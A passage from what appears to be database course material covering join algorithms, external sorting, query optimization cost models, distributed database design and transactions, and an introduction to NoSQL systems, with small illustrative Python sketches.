The index is used to look up tuples in s that will satisfy the join condition with tuple tr.
This join method is called an indexed nested-loop join and it can be used with existing indices,
as well as with temporary indices created for the sole purpose of evaluating the join. The time
cost of the join can be computed as br (tT + tS) + nr ∗ c, where nr is the number of records in
relation r, and c is the cost of a single selection on s using the join condition.
The merge-join algorithm (also called the sort-merge-join algorithm) can be used to
compute natural joins and equi-joins. Let r(R) and s(S) be the relations whose natural join is to
be computed, and let R ∩ S denote their common attributes. Both relations must be sorted on
R ∩ S; the join can then be computed much like the merge stage of the merge–sort algorithm.
The algorithm associates one pointer with each relation. These pointers initially point to the first
tuple of the respective relations and, as the algorithm proceeds, they move forward through the
relations, joining pairs of tuples with equal values on the join attributes.
The hybrid merge-join technique combines indices with merge join; it can be used when one
relation is sorted and the other has a secondary B+-tree index on the join attributes. The hybrid merge-
join algorithm merges the sorted relation with the leaf entries of the secondary B+-tree index.
The result file contains tuples from the sorted relation and addresses for tuples of the unsorted
relation. The result file is then sorted on the addresses of the tuples of the unsorted relation, allowing
efficient retrieval of the corresponding tuples, in physical storage order, to complete the join.
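A minimal sketch of the merge step in Python (illustrative; it assumes a single join attribute stored as the first field of each tuple and that both inputs are already sorted on it):

def merge_join(r, s):
    result, i, j = [], 0, 0
    while i < len(r) and j < len(s):
        if r[i][0] < s[j][0]:
            i += 1
        elif r[i][0] > s[j][0]:
            j += 1
        else:
            # Collect the group of s-tuples with this key and pair it with
            # every r-tuple carrying the same key.
            key = r[i][0]
            j_start = j
            while j < len(s) and s[j][0] == key:
                j += 1
            while i < len(r) and r[i][0] == key:
                result.extend(r[i] + t for t in s[j_start:j])
                i += 1
    return result

r = [(1, "a"), (2, "b"), (2, "c"), (5, "d")]
s = [(2, "x"), (2, "y"), (3, "z")]
print(merge_join(r, s))
# [(2, 'b', 2, 'x'), (2, 'b', 2, 'y'), (2, 'c', 2, 'x'), (2, 'c', 2, 'y')]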
In the hash-join algorithm, a hash function h is used to partition tuples of both relations.
The basic idea is to partition the tuples of each of the relations into sets that have the same hash
value on the join attributes.
After the partitioning of the relations, the rest of the hash-join code performs a separate
indexed nested-loop join on each of the partition pairs i, for i = 0, . . . , nh. To do so, it first
builds a hash index on each si, and then probes with tuples from ri. The relation s is the build
input, and r is the probe input. The system repeats this splitting of the input until each partition
of the build input fits in memory. Such partitioning is called recursive partitioning.
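A compact Python sketch of the partition/build/probe idea (illustrative only; it works entirely in memory and uses Python's built-in hash as both the partitioning function and the per-partition index):

def hash_join_partition_pair(r_i, s_i):
    # Build phase: hash index on the (smaller) build input s_i.
    build = {}
    for ts in s_i:
        build.setdefault(ts[0], []).append(ts)
    # Probe phase: look up each tuple of the probe input r_i.
    result = []
    for tr in r_i:
        for ts in build.get(tr[0], []):
            result.append(tr + ts)
    return result

def hash_join(r, s, nh=4):
    h = lambda t: hash(t[0]) % nh            # partitioning hash function
    r_parts = [[t for t in r if h(t) == i] for i in range(nh)]
    s_parts = [[t for t in s if h(t) == i] for i in range(nh)]
    out = []
    for i in range(nh):                      # join each partition pair separately
        out += hash_join_partition_pair(r_parts[i], s_parts[i])
    return out

r = [(1, "a"), (2, "b"), (3, "c")]
s = [(2, "x"), (3, "y"), (3, "z")]
print(hash_join(r, s))   # (2,'b',2,'x'), (3,'c',3,'y'), (3,'c',3,'z')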
Handling of Overflows
• Hash-table overflow occurs in a partition of the build relation if its in-memory hash index
is larger than main memory; it is avoided by increasing the number of partitions.
• The number of partitions is therefore increased by a small value, called the fudge
factor, that is usually about 20 percent of the computed number of hash partitions.
• External sorting refers to sorting algorithms that are suitable for large files of records
stored on disk that do not fit entirely in main memory.
• Use a sort-merge strategy, which starts by sorting small subfiles – called runs – of
the main file and merges the sorted runs, creating larger sorted subfiles that are
merged in turn.
• The algorithm consists of two phases: sorting phase and merging phase.
➢ Sorting phase
Runs of the file that can fit in the available buffer space are read into main memory,
sorted using an internal sorting algorithm, and written back to disk as temporary sorted
subfiles (or runs).
– The number of initial runs is nR = ⌈b / nB⌉, where b is the number of file blocks and nB is the available buffer space in blocks.
If the available buffer size is 5 blocks and the file contains 1024 blocks, then there are 205
initial runs each of size 5 blocks. After the sort phase, 205 sorted runs are stored as
temporary subfiles on disk.
➢ Merging phase
▪ The degree of merging (dM ) is the number of runs that can be merged together in
each pass.
▪ In each pass, one buffer block is needed to hold one block from each of the runs
being merged, and one block is needed for containing one block of the merge result.
▪ dM = min(nB − 1, nR), and the number of passes is ⌈logdM (nR)⌉.
▪ In previous example, dM = 4, 205 runs → 52 runs → 13 runs → 4 runs → 1 run.
This means 4 passes.
▪ The complexity of external sorting (number of block accesses) is (2 × b) + (2 × (b ×
⌈logdM (nR)⌉)).
For example:
– 5 initial runs [2, 8, 11], [4, 6, 7], [1, 9, 13], [3, 12, 15], [5, 10, 14].
– The available buffer nB = 3 blocks → dM = 2 (two-way merge)
– After first pass: 3 runs
[2, 4, 6, 7, 8, 11], [1, 3, 9, 12, 13, 15], [5, 10, 14]
– After second pass: 2 runs
[1, 2, 3, 4, 6, 7, 8, 9, 11, 12, 13, 15], [5, 10, 14]
– After third pass:
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
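The same two-phase procedure can be sketched in a few lines of Python (illustrative; runs are modelled as in-memory lists, and heapq.merge plays the role of the dM-way merge):

import heapq

def external_sort(runs_input, nB=3):
    # Sorting phase: each run fits in the buffer and is sorted in memory.
    runs = [sorted(run) for run in runs_input]
    dM = nB - 1                                  # degree of merging
    # Merging phase: repeatedly merge dM runs at a time until one run remains.
    while len(runs) > 1:
        merged = []
        for i in range(0, len(runs), dM):
            merged.append(list(heapq.merge(*runs[i:i + dM])))
        runs = merged
    return runs[0]

runs = [[2, 8, 11], [4, 6, 7], [1, 9, 13], [3, 12, 15], [5, 10, 14]]
print(external_sort(runs))    # [1, 2, ..., 15] after three two-way merge passes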
We apply heuristic rules to modify the internal representation of a query which is usually
in the form of a query tree or a query graph data structure to improve its expected performance.
The SELECT and PROJECT operations reduce the size of a file and hence should be applied
before a join or other binary operation. A query tree is used to represent a relational algebra or
extended relational algebra expression. A query graph is used to represent a relational calculus
expression.
Query Tree
A query tree is a tree data structure that corresponds to a relational algebra expression.
It represents the input relations of the query as leaf nodes of the tree, and represents the
relational algebra operations as internal nodes. An execution of the query tree consists of
executing an internal node operation whenever its operands are available and then replacing
that internal node by the relation that results from executing the operation. The order of
execution of operations starts at the leaf nodes which represents the input database relations for
the query, and ends at the root node, which represents the final operation of the query. The
execution terminates when the root node operation is executed and produces the result relation
for the query.
Query Graph
Relations in the query are represented by relation nodes, which are displayed as single
circles. Constant values, typically from the query selection conditions, are represented by
constant nodes, which are displayed as double circles or ovals. Selection and join conditions
are represented by the graph edges. The attributes to be retrieved from each relation are
displayed in square brackets above each relation. The query graph does not indicate an order on
which operations to perform first. There is only a single graph corresponding to each query.
Hence, a query graph corresponds to a relational calculus expression. Example:
1. Cascade of σ: σ c1 and c2 and ... and cn (R) ≡ σc1 (σc2 (. . . (σcn (R)) . . .))
2. Commutativity of σ: σc1 (σc2 (R)) ≡ σc2 (σc1 (R))
3. Cascade of π: πList1 (πList2 (. . . (πListn (R)) . . .)) ≡ πList1 (R)
5. Commutativity of ⋈ (and ×): R ⋈c S ≡ S ⋈c R and R × S ≡ S × R
6. Commuting σ with ⋈ (or ×): If the selection condition c involves only the attributes of R,
then σc (R ⋈ S) ≡ (σc (R)) ⋈ S. More generally, if c can be written as (c1 and c2), where c1
involves only the attributes of R and c2 involves only the attributes of S, then
σc (R ⋈ S) ≡ (σc1 (R)) ⋈ (σc2 (S)).
7. Commuting π with ⋈ (or ×): Suppose the projection list is L = {A1, . . . , An, B1, . . . ,
Bm}, where A1, . . . , An are attributes of R and B1, . . . , Bm are attributes of S.
∗ If the join condition c involves only attributes in L: πL (R ⋈c S) ≡ (πA1 ,...,An (R))
⋈c (πB1 ,...,Bm (S))
∗ Otherwise, if c also involves attributes An+1, . . . , An+k of R and Bm+1, . . . , Bm+p of S:
πL (R ⋈c S) ≡ πL ((πA1 ,...,An,An+1 ,...,An+k (R)) ⋈c (πB1 ,...,Bm ,Bm+1 ,...,Bm+p (S)))
10. Commuting σ with set operations: Let θ be one of the three set operations ∩, ∪,
and −. Then σc(R θ S) ≡ (σc(R)) θ (σc(S)).
DeMorgan's laws: not (c1 and c2) ≡ (not c1) or (not c2) and not (c1 or c2) ≡ (not c1) and (not c2)
1. Break up the SELECT operations: Using rule 1, break up any SELECT operations
with conjunctive conditions into a cascade of SELECT operations.
2. Push down the SELECT operations: Using rules 2, 4, 6, and 10 concerning the
commutativity of SELECT with other operations, move each SELECT operation
as far down the tree as is permitted by the attributes involved in the select
condition.
3. Rearrange the leaf nodes: Using rules 5 and 9 concerning commutativity and
associativity of binary operations, rearrange the leaf nodes of the tree using the
following criteria.
▪ Position the leaf node relations with most restrictive SELECT operations so
they are executed first in the query tree.
▪ Make sure that the ordering of leaf nodes does not cause CARTESIAN
PRODUCT operations.
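As a brief illustration of steps 1 and 2 (the relation and attribute names are borrowed from the EMPLOYEE/DEPARTMENT examples used later in this book and are only illustrative):
πLname (σDno=5 and Salary>30000 (EMPLOYEE ⋈Dno=Dnumber DEPARTMENT))
≡ πLname (σDno=5 (σSalary>30000 (EMPLOYEE ⋈Dno=Dnumber DEPARTMENT)))    by rule 1
≡ πLname ((σDno=5 and Salary>30000 (EMPLOYEE)) ⋈Dno=Dnumber DEPARTMENT)    by rule 6, since both conditions involve only EMPLOYEE attributes.
The selections now shrink EMPLOYEE before the expensive join is evaluated.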
A query optimizer does not depend solely on heuristic rules. It also estimates and
compares the costs of executing a query using different execution strategies and algorithms, and
then chooses the strategy with the lowest cost estimate. For compiled queries, the
optimization is done at compile time and the resulting execution strategy code is stored and
executed directly at run time; for interpreted queries, the entire process occurs at run
time.
The cost of executing a query includes the following components:
1. Access cost to secondary storage - This is the cost of transferring (reading and writing)
data blocks between secondary disk storage and main memory buffers. This is also
known as disk I/O (input/output) cost.
2. Disk storage cost - This is the cost of storing on disk any intermediate files that are
generated by an execution strategy for the query.
3. Computation cost - This is the cost of performing in-memory operations on the records
within the data buffers during query execution. Such operations include searching for
and sorting records, merging records for a join or a sort operation, and performing
computations on field values. This is also known as CPU (central processing unit) cost.
4. Memory usage cost - This is the cost pertaining to the number of main memory buffers
needed during query execution.
5. Communication cost - This is the cost of shipping the query and its results from the
database site to the site or terminal where the query originated.
To estimate these costs, the optimizer needs statistics stored in the DBMS catalog. For a
file whose records are all of the same type, the number of records (tuples) (r), the (average)
record size (R), and the number of file blocks (b) (or close estimates of them) are needed.
• The blocking factor (bfr) for the file may also be needed.
• The primary file organization records may be unordered, ordered by an attribute with
or without a primary or clustering index, or hashed (static hashing or one of the dynamic
hashing methods) on a key attribute.
• Information is also kept on all primary, secondary, or clustering indexes and their
indexing attributes.
• The number of levels (x) of each multilevel index (primary, secondary, or clustering) is
needed for cost functions that estimate the number of block accesses that occur during
query execution.
• In some cost functions the number of first-level index blocks (bI1) is needed.
• Another important parameter is the number of distinct values (d) of an attribute and the
attribute selectivity (sl), which is the fraction of records satisfying an equality condition
on the attribute.
• This allows estimation of the selection cardinality (s = sl*r) of an attribute, which is the
average number of records that will satisfy an equality selection condition on that
attribute.
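For example (the numbers are purely illustrative): if a file has r = 10,000 records and an attribute Dno has d = 50 distinct values assumed to be uniformly distributed, the selectivity of an equality condition on Dno is sl = 1/d = 0.02, and the selection cardinality is s = sl * r = 0.02 * 10,000 = 200, i.e., about 200 records are expected to satisfy a condition such as Dno = 5.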
A new temporary relation is created after each join operation. Both the join method and
the access methods for the input relations must be determined. The simplest access method is a
table scan (that is, a linear search). If a selection is applied to a relation before the join, two
options exist - a table scan (linear search) or the use of an index on the selection attribute - and
the optimizer must compare their estimated costs. When a plan uses several indexes, the overall
cost is composed by adding the cost of the individual index scans and the cost of fetching the
records in the intersection of the retrieved lists of pointers. We can minimize the cost by sorting
the list of pointers and fetching the records in sorted order. So, we note the following two points
for cost estimation:
• We can fetch all selected records of the block using a single I/O operation because each
pointer in the block appears together.
• The disk-arm movement gets minimized as blocks are read in sorted order.
Here, br is the number of blocks in the file, hi denotes the height of the B+- tree, b is the
number of blocks holding records with specified search key, n is the number of fetched records,
tT – average time taken by disk subsystem to transfer a block of data and tS - average block-
access time (disk seek time plus rotational latency).
Linear Search, Equality on Key
Cost: tS + (br / 2) ∗ tT
Reason: It is the average case, where only one record satisfies the condition; as soon as it is found, the scan terminates.
Primary B+-tree index, Equality on Key
Cost: (hi + 1) ∗ (tT + tS)
Reason: Each I/O operation needs one seek and one block transfer to fetch the record by traversing the height of the tree.
Primary B+-tree index, Equality on Nonkey
Cost: hi ∗ (tT + tS) + b ∗ tT
Reason: It needs one seek for each level of the tree and one seek for the first block; the b matching blocks are then transferred consecutively.
Secondary B+-tree index, Equality on Key
Cost: (hi + 1) ∗ (tT + tS)
Reason: Each I/O operation needs one seek and one block transfer to fetch the record by traversing the height of the tree.
Secondary B+-tree index, Equality on Nonkey
Cost: (hi + n) ∗ (tT + tS)
Reason: It requires one seek per record because each record may be on a different block.
Primary B+-tree index, Comparison
Cost: hi ∗ (tT + tS) + b ∗ tT
Reason: It needs one seek for each level of the tree and one seek for the first block; the matching blocks are then transferred consecutively.
Secondary B+-tree index, Comparison
Cost: (hi + n) ∗ (tT + tS)
Reason: It requires one seek per record because each record may be on a different block.
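The formulas above are easy to evaluate for concrete parameter values. The following small Python helper is illustrative only; the timing values tS = 4 ms and tT = 0.1 ms and the other default parameters are assumptions, not figures from this chapter.

def selection_cost(algorithm, hi=3, br=1000, b=4, n=10, tT=0.1, tS=4.0):
    """Estimated cost in milliseconds of a selection, using the formulas above."""
    formulas = {
        "linear search, equality on key": tS + (br / 2) * tT,
        "primary B+-tree, equality on key": (hi + 1) * (tT + tS),
        "primary B+-tree, equality on nonkey / comparison": hi * (tT + tS) + b * tT,
        "secondary B+-tree, equality on key": (hi + 1) * (tT + tS),
        "secondary B+-tree, equality on nonkey / comparison": (hi + n) * (tT + tS),
    }
    return formulas[algorithm]

# With hi = 3, n = 10, tS = 4 ms and tT = 0.1 ms, fetching 10 records through a
# secondary index costs (3 + 10) * 4.1 = 53.3 ms, versus (3 + 1) * 4.1 = 16.4 ms
# for a single-record equality lookup, which is why secondary indexes pay off
# only when few records are fetched.
print(selection_cost("secondary B+-tree, equality on nonkey / comparison"))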
CHAPTER – XII
DISTRIBUTED DATABASES
12.1. INTRODUCTION
For a database to be called distributed, the following minimum conditions should be satisfied:
• Connection of database nodes over a computer network: There are multiple computers,
called sites or nodes, connected by a network that transmits data and commands among them.
• Logical interrelation of the connected databases: The data stored at the various nodes
must be logically related so that it can be managed as one distributed database.
• Possible absence of homogeneity among connected nodes: It is not necessary that all
nodes be identical in terms of data, hardware, and software.
12.1.1. Transparency
In a DDB scenario, the data and software are distributed over multiple nodes connected
by a computer network. So, additional types of transparencies are needed, as listed below:
• Data organization transparency (also known as distribution or network transparency):
This refers to freedom for the user from the operational details of the network and the
placement of the data in the distributed system.
o Location transparency refers to the fact that the command used to perform a task
is independent of the location of the data and the location of the node where the
command was issued.
o Naming transparency implies that once a name is associated with an object, the
named objects can be accessed unambiguously without additional specification as
to where the data is located.
• Replication transparency: Copies of the same data objects may be stored at multiple
sites for better availability, performance, and reliability. Replication transparency makes
the user unaware of the existence of these copies.
• Fragmentation transparency: Two types of fragmentation are possible.
o Horizontal fragmentation distributes a relation (table) into subrelations that are
subsets of the tuples (rows) in the original relation; this is also known as sharding
in the newer big data and cloud computing systems.
o Vertical fragmentation distributes a relation into subrelations where each
subrelation is defined by a subset of the columns of the original relation.
Fragmentation transparency makes the user unaware of the existence of fragments.
Other transparencies include design transparency and execution transparency—which
refer, respectively, to freedom from knowing how the distributed database is designed and
where a transaction executes.
12.1.2. Availability and Reliability
Reliability and availability are two of the most common potential advantages cited for
distributed databases. Reliability is broadly defined as the probability that a system is running
(not down) at a certain time point, whereas availability is the probability that the system is
continuously available during a time interval. We can directly relate reliability and availability
of the database to the faults, errors, and failures associated with it. A failure can be described
as a deviation of a system’s behavior from that which is specified in order to ensure correct
execution of operations.
Errors constitute that subset of system states that causes the failure. Fault is the cause of
an error.
To construct a system that is reliable, we can adopt several approaches. One common
approach stresses fault tolerance; it recognizes that faults will occur, and it designs mechanisms
that can detect and remove faults before they can result in a system failure. Another more
stringent approach attempts to ensure that the final system does not contain any faults. This is
done through an exhaustive design process followed by extensive quality control and testing.
12.1.3. Scalability and Partition Tolerance
Scalability determines the extent to which the system can expand its capacity while
continuing to operate without interruption. There are two types of scalability:
• Horizontal scalability: This refers to expanding the number of nodes in the distributed
system. As nodes are added to the system, it should be possible to distribute some of the
data and processing loads from existing nodes to the new nodes.
• Vertical scalability: This refers to expanding the capacity of the individual nodes in the
system, such as expanding the storage capacity or the processing power of a node.
The concept of partition tolerance states that the system should have the capacity to
continue operating while the network is partitioned.
12.1.4. Autonomy
Autonomy determines the extent to which individual nodes or DBs in a connected DDB
can operate independently. A high degree of autonomy is desirable for increased flexibility and
customized maintenance of an individual node. Autonomy can be applied to design,
communication, and execution.
• Communication autonomy determines the extent to which each node can decide on
sharing of information with other nodes.
An important advantage of distributed databases is increased availability. This is achieved by
isolating faults to their site of origin without affecting the other database nodes connected to
the network, so that only the data and software at the failed site become inaccessible. Further
improvement is achieved by judiciously replicating data and software at more than one site.
There are number of types of DDBMSs based on various criteria and factors. The factors
that make some of these systems different are
• Degree of homogeneity of the DDBMS software: If all servers (or individual local
DBMSs) use identical software and all users (clients) use identical software, the
DDBMS is called homogeneous; otherwise, it is called heterogeneous.
• Degree of local autonomy: If there is no provision for the local site to function as a
standalone DBMS, then the system has no local autonomy. On the other hand, if direct
access by local transactions to a server is permitted, the system has some degree of local
autonomy.
• Point A: For a centralized database, there is complete autonomy but a total lack of
distribution and heterogeneity.
• Point B: At one extreme of the autonomy spectrum, we have a DDBMS that looks like
a centralized DBMS to the user, with zero autonomy.
The degree of local autonomy provides further ground for classification into federated
and multidatabase systems.
• Point C: The term federated database system (FDBS) is used when there is some global
view or schema of the federation of databases that is shared by the applications.
• Point D: On the other hand, a multidatabase system has full local autonomy in that it
does not have a global schema but interactively constructs one as needed by the
application.
There are two main types of multiprocessor system architectures that are commonplace:
• Shared memory (tightly coupled) architecture: Multiple processors share secondary
(disk) storage and also share primary memory.
• Shared disk (loosely coupled) architecture: Multiple processors share secondary (disk)
storage, but each has its own primary memory.
Figure 12.2: Some different database system architectures. (a) Shared-nothing architecture
In this section, we discuss both the logical and component architectural models of a
DDB. In Figure 12.3, which describes the generic schema architecture of a DDB, the enterprise
is presented with a consistent, unified view showing the logical structure of underlying data
across all nodes. This view is represented by the global conceptual schema (GCS), which
provides network transparency.
The logical organization of data at each site is specified by the local conceptual schema
(LCS). The GCS, LCS, and their underlying mappings provide the fragmentation and
replication transparency.
Each local DBMS would have its local query optimizer, transaction manager, and
execution engines as well as the local system catalog, which houses the local schemas. The
global transaction manager is responsible for coordinating the execution across multiple sites
in conjunction with the local transaction manager at those sites.
• Local schema is the conceptual schema (full database definition) of a component database.
• Component schema is derived by translating the local schema into a canonical data
model or common data model (CDM) for the FDBS.
• Export schema represents the subset of a component schema that is available to the
FDBS.
• Federated schema is the global schema or view, which is the result of integrating all the
shareable export schemas.
• External schemas define the schema for a user group or an application, as in the three-
level schema architecture.
Figure 12.4: The five-level schema architecture in a federated database system (FDBS)
In a DDB, decisions must be made regarding which site should be used to store which
portions of the database. For now, we will assume that there is no replication; that is, each
relation—or portion of a relation—is stored at one site only.
Before we decide on how to distribute the data, we must determine the logical units of
the database that are to be distributed. The simplest logical units are the relations themselves;
that is, each whole relation is to be stored at a particular site. In our example, we must decide
on a site to store each of the relations EMPLOYEE, DEPARTMENT, PROJECT,
WORKS_ON, and DEPENDENT. In many cases, however, a relation can be divided into
smaller logical units for distribution. For example, consider the company database and assume
there are three computer sites—one for each department in the company. We may want to store
the database information relating to each department at the computer site for that department.
A technique called horizontal fragmentation or sharding can be used to partition each relation
by department.
A horizontal fragment or shard of a relation is a subset of the tuples in that relation. The
tuples that belong to the horizontal fragment can be specified by a condition on one or more
attributes of the relation, or by some other mechanism. For example, we may define three
horizontal fragments on the EMPLOYEE relation with the following conditions: (Dno = 5),
(Dno = 4), and (Dno = 1)—each fragment contains the EMPLOYEE tuples working for a
particular department. Similarly, we may define three horizontal fragments for the PROJECT
relation, with the conditions (Dnum = 5), (Dnum = 4), and (Dnum = 1) - each fragment contains
the PROJECT tuples controlled by a particular department. Horizontal fragmentation divides a
relation horizontally by grouping rows to create subsets of tuples, where each subset has a
certain logical meaning. These fragments can then be assigned to different sites (nodes) in the
distributed system.
Each site may not need all the attributes of a relation, which would indicate the need for
a different type of fragmentation. Vertical fragmentation divides a relation “vertically” by
columns. A vertical fragment of a relation keeps only certain attributes of the relation. For
example, we may want to fragment the EMPLOYEE relation into two vertical fragments. The
first fragment includes personal information—Name, Bdate, Address, and Sex—and the second
includes work-related information—Ssn, Salary, Super_ssn, and Dno. A vertical fragment on a
relation R can be specified by a πLi (R) operation in the relational algebra. A set of vertical
fragments whose projection lists L1, L2, … , Ln include all the attributes in R but share only the
primary key attribute of R is called a complete vertical fragmentation of R. In this case the
projection lists satisfy the following two conditions:
• L1 ∪ L2 ∪ … ∪ Ln = ATTRS(R)
• Li ∩ Lj = PK(R) for any i ≠ j, where ATTRS(R) is the set of attributes of R and PK(R)
is the primary key of R
We can intermix the two types of fragmentation, yielding a mixed fragmentation. For
example, we may combine the horizontal and vertical fragmentations of the EMPLOYEE
relation given earlier into a mixed fragmentation that includes six fragments. In this case, the
original relation can be reconstructed by applying UNION and OUTER UNION (or OUTER
JOIN) operations in the appropriate order.
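As a worked illustration of these definitions (fragment names are only illustrative, and the horizontal reconstruction assumes every employee belongs to department 1, 4 or 5): the horizontal fragmentation of EMPLOYEE described above corresponds to
EMP1 = σDno=5 (EMPLOYEE), EMP2 = σDno=4 (EMPLOYEE), EMP3 = σDno=1 (EMPLOYEE),
and the original relation is recovered as EMPLOYEE = EMP1 ∪ EMP2 ∪ EMP3. For the vertical case, if Ssn is added to the first fragment so that the two conditions above are satisfied, the fragments
EMP_PERSONAL = πSsn, Name, Bdate, Address, Sex (EMPLOYEE) and EMP_WORK = πSsn, Salary, Super_ssn, Dno (EMPLOYEE)
form a complete vertical fragmentation, and the relation is recovered by a natural join on the shared key Ssn: EMPLOYEE = EMP_PERSONAL ⋈ EMP_WORK.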
The global and local transaction management software modules, along with the
concurrency control and recovery manager of a DDBMS, collectively guarantee the ACID
properties of transactions. An additional component called the global transaction manager is
introduced for supporting distributed transactions. The site where the transaction originated can
temporarily assume the role of global transaction manager and coordinate the execution of
database operations with transaction managers across multiple sites. The operations exported
by this interface are BEGIN_TRANSACTION, READ or WRITE, END_TRANSACTION,
COMMIT_TRANSACTION, and ROLLBACK (or ABORT).
• For WRITE operations, it ensures that updates are visible across all sites containing
copies (replicas) of the data item.
• For ABORT operations, the manager ensures that no effects of the transaction are
reflected in any site of the distributed database.
• For COMMIT operations, it ensures that the effects of a write are persistently recorded
on all databases containing copies of the data item.
The transaction manager passes to the concurrency controller module the database
operations and associated information. The controller is responsible for acquisition and release
of associated locks. If the transaction requires access to a locked resource, it is blocked until the
lock is acquired. Once the lock is acquired, the operation is sent to the runtime processor, which
handles the actual execution of the database operation. Once the operation is completed, locks
are released and the transaction manager is updated with the result of the operation.
We described the two-phase commit protocol (2PC), which requires a global recovery
manager, or coordinator, to maintain information needed for recovery, in addition to the local
recovery managers and the information they maintain (log, tables). The two-phase commit
protocol has certain drawbacks that led to the development of the three-phase commit protocol.
The biggest drawback of 2PC is that it is a blocking protocol. Failure of the coordinator
blocks all participating sites, causing them to wait until the coordinator recovers. This can cause
performance degradation, especially if participants are holding locks to shared resources. Other
types of problems may also occur that make the outcome of the transaction nondeterministic.
These problems are solved by the three-phase commit (3PC) protocol, which essentially divides
the second commit phase into two subphases called prepare-to-commit and commit. The main
idea is to limit the wait time for participants who have prepared to commit and are waiting for
a global commit or abort from the coordinator. When a participant receives a precommit
message, it knows that the rest of the participants have voted to commit. If a precommit message
has not been received, then the participant will abort and release all locks.
Now we give an overview of how a DDBMS processes and optimizes a query. First we
discuss the steps involved in query processing and then elaborate on the communication costs
of processing a distributed query. Then we discuss a special operation, called a semijoin, which
is used to optimize some types of queries in a DDBMS.
1. Query Mapping: The input query on distributed data is specified formally using a query
language. It is then translated into an algebraic query on global relations. This translation
is done by referring to the global conceptual schema and does not take into account the
actual distribution and replication of data. Hence, this translation is largely identical to
the one performed in a centralized DBMS. It is first normalized, analyzed for semantic
errors, simplified, and finally restructured into an algebraic query.
2. Localization: The algebraic query on global relations is mapped to queries on individual
fragments, using data distribution and replication information.
3. Global Query Optimization: A strategy is selected from a list of candidate plans, usually by
estimating costs, with communication (data transfer) cost as a dominant factor.
4. Local Query Optimization: This stage is common to all sites in the DDB. The
techniques are similar to those used in centralized systems.
The first three stages discussed above are performed at a central control site, whereas
the last stage is performed locally.
We illustrate this with two simple sample queries. Suppose that the EMPLOYEE and
DEPARTMENT relations are distributed at two sites as shown in Figure 12.4. We will assume
in this example that neither relation is fragmented. The size of the EMPLOYEE relation is 100
* 10,000 = 1,000,000 bytes, and the size of the DEPARTMENT relation is 35 * 100 = 3,500 bytes.
Consider the query Q: For each employee, retrieve the employee name and the name of
the department for which the employee works. This can be stated as follows in the relational
algebra: Q: πFname, Lname, Dname(EMPLOYEE ⋈Dno=Dnumber DEPARTMENT)
The result of this query will include 10,000 records, assuming that every employee is
related to a department. Suppose that each record in the query result is 40 bytes long. The query
is submitted at a distinct site 3, which is called the result site because the query result is needed
there. Neither the EMPLOYEE nor the DEPARTMENT relations reside at site 3. There are
three simple strategies for executing this distributed query:
1. Transfer both the EMPLOYEE and the DEPARTMENT relations to the result site, and
perform the join at site 3. In this case, a total of 1,000,000 + 3,500 = 1,003,500 bytes
must be transferred.
2. Transfer the EMPLOYEE relation to site 2, execute the join at site 2, and send the result
to site 3. The size of the query result is 40 * 10,000 = 400,000 bytes, so 400,000 +
1,000,000 = 1,400,000 bytes must be transferred.
3. Transfer the DEPARTMENT relation to site 1, execute the join at site 1, and send the
result to site 3. In this case, 400,000 + 3,500 = 403,500 bytes must be transferred.
If minimizing the amount of data transfer is our optimization criterion, we should choose
strategy 3.
A more complex strategy, which sometimes works better than these simple strategies,
uses an operation called semijoin.
The idea behind distributed query processing using the semijoin operation is to reduce
the number of tuples in a relation before transferring it to another site. Intuitively, the idea is to
send the joining column of one relation R to the site where the other relation S is located; this
column is then joined with S. Following that, the join attributes, along with the attributes
required in the result, are projected out and shipped back to the original site and joined with R.
Hence, only the joining column of R is transferred in one direction, and a subset of S with no
extraneous tuples or attributes is transferred in the other direction. If only a small fraction of the
tuples in S participate in the join, this can be an efficient solution to minimizing data transfer.
1. Project the join attributes of DEPARTMENT at site 2, and transfer them to site 1. For
Q, we transfer F = πDnumber(DEPARTMENT), whose size is 4 * 100 = 400 Bytes.
2. Join the transferred file with the EMPLOYEE relation at site 1, and transfer the required
attributes from the resulting file to site 2. For Q, we transfer R = πDno, Fname, Lname(F
⋈Dnumber=Dno EMPLOYEE), whose size is 34 * 10,000 = 340,000 bytes.
3. Execute the query by joining the transferred file R with DEPARTMENT, and present
the result to the user at site 3.
Using this strategy, we transfer 340,400 bytes for Q. We limited the EMPLOYEE
attributes and tuples transmitted to site 2 in step 2 to only those that will actually be joined with
a DEPARTMENT tuple in step 3.
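The comparison can be tabulated with a few lines of Python (illustrative only; it simply reproduces the byte counts derived above):

EMP_SIZE, DEPT_SIZE = 1_000_000, 3_500        # bytes: 10,000*100 and 100*35
RESULT_SIZE = 10_000 * 40                     # join result shipped to site 3

strategies = {
    "1: ship both relations to site 3": EMP_SIZE + DEPT_SIZE,
    "2: ship EMPLOYEE to site 2, result to site 3": EMP_SIZE + RESULT_SIZE,
    "3: ship DEPARTMENT to site 1, result to site 3": DEPT_SIZE + RESULT_SIZE,
    "semijoin: Dnumber column to site 1, reduced EMPLOYEE back": 100 * 4 + 10_000 * 34,
}
for name, cost in sorted(strategies.items(), key=lambda kv: kv[1]):
    print(f"{cost:>9,} bytes  {name}")
# Prints 340,400 / 403,500 / 1,003,500 / 1,400,000 bytes, matching the text.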
CHAPTER – XIII
NOSQL DATABASES
13.1. INTRODUCTION
The term NOSQL is generally interpreted as Not Only SQL—rather than NO to SQL—
and is meant to convey that many applications need systems other than traditional relational
SQL systems to augment their data management needs. Most NOSQL systems are distributed
databases or distributed storage systems, with a focus on semistructured data storage, high
performance, availability, data replication, and scalability as opposed to an emphasis on
immediate data consistency, powerful query languages, and structured data storage.
Consider a free e-mail application, such as Google Mail. There is a need for a storage
system that can manage all these e-mails. A structured relational SQL system may not be
appropriate because
• SQL systems offer too many services (powerful query language, concurrency control,
etc.), which this application may not need
• A structured data model such as the traditional relational model may be too restrictive.
Although newer relational systems do have more complex object relational modelling
options, they still require schemas, which are not required by many of the NOSQL systems.
Some of the organizations that were faced with these data management and storage
applications decided to develop their own systems:
• Google developed a proprietary NOSQL system known as BigTable, which is used in
many of Google's applications and led to the category of NOSQL systems
known as column-based or wide column stores; they are also sometimes referred to as
column family stores.
• Facebook developed a NOSQL system called Cassandra, which is now open source and
known as Apache Cassandra. This NOSQL system uses concepts from both key-value
stores and column-based systems.
• Other software companies started developing their own solutions and making them
available to users who need these capabilities—for example, MongoDB and CouchDB,
which are classified as document-based NOSQL systems or document stores.
• Some NOSQL systems, such as OrientDB, combine concepts from many of the
categories discussed above.
• NOSQL systems emphasize high availability, so replicating the data is inherent in many
of these systems.
• Scalability is another important characteristic, because many of the applications that use
NOSQL systems tend to have data that keeps growing in volume.
